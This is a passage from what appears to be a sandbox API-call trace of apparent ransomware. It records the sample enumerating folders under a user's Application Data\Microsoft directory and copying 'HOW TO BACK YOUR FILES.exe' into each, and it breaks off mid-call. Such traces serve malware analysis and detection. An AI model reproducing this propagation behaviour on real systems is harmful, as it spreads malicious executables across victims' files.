lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.674] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.675] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3" [0104.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0104.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0104.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3") returned 107 [0104.675] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3" [0104.675] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.675] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\internet explorer\\domstore\\3lkbqzj3\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.675] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.676] GetLastError () returned 0x0 [0104.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.676] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.676] CloseHandle (hObject=0x120) returned 1 [0104.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.676] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1d705b70, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x4dcaca00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dcaca00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.676] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.676] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.676] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP9_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP9_0" [0104.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0198 | out: hHeap=0x2b0000) returned 1 [0104.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0104.676] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP9_0") returned 79 [0104.676] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP9_0" [0104.676] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.677] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP9_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\imjp9_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.677] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.677] GetLastError () returned 0x0 [0104.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.677] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.678] CloseHandle (hObject=0x120) returned 1 [0104.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.678] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.678] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4dcaca00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dcaca00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.678] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.678] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.678] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP8_1", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP8_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP8_1" [0104.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d00f0 | out: hHeap=0x2b0000) returned 1 [0104.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0104.678] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP8_1") returned 79 [0104.678] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP8_1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP8_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP8_1" [0104.678] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.678] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP8_1\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\imjp8_1\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.679] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.679] GetLastError () returned 0x0 [0104.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.679] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.679] CloseHandle (hObject=0x120) returned 1 [0104.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.679] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.679] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4dcaca00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dcaca00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.679] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.679] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.680] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP12" [0104.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0048 | out: hHeap=0x2b0000) returned 1 [0104.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0104.680] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP12") returned 78 [0104.680] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP12" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP12" [0104.680] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.680] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP12\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\imjp12\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.680] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.681] GetLastError () returned 0x0 [0104.681] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.681] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.681] CloseHandle (hObject=0x120) returned 1 [0104.681] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.681] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.681] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IMJP12\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4dcd2b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dcd2b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.681] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.681] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.681] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IME12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IME12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IME12" [0104.681] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cffa0 | out: hHeap=0x2b0000) returned 1 [0104.681] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0104.681] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IME12") returned 77 [0104.681] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IME12" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IME12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IME12" [0104.682] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.682] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IME12\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\ime12\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.682] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.682] GetLastError () returned 0x0 [0104.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.683] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.683] CloseHandle (hObject=0x120) returned 1 [0104.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.683] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.683] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\IME12\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd754c00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4dcd2b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dcd2b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.683] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.683] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.683] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\FORMS", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\FORMS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\FORMS" [0104.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfef8 | out: hHeap=0x2b0000) returned 1 [0104.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0104.683] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\FORMS") returned 77 [0104.683] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\FORMS" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\FORMS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\FORMS" [0104.683] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.683] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\FORMS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\forms\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.691] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.692] GetLastError () returned 0x0 [0104.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.692] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.692] CloseHandle (hObject=0x120) returned 1 [0104.692] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.692] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.692] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\FORMS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d1d6940, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6cd477c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cd477c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.692] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.692] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.693] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" [0104.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d77b0 | out: hHeap=0x2b0000) returned 1 [0104.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0104.693] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache") returned 83 [0104.693] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" [0104.693] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.693] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.693] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.694] GetLastError () returned 0x0 [0104.694] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.694] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.694] CloseHandle (hObject=0x120) returned 1 [0104.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.694] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.694] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cd93a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cd93a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.694] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.694] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.694] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0104.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd968 | out: hHeap=0x2b0000) returned 1 [0104.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0104.694] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned 92 [0104.694] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0104.694] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.695] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), 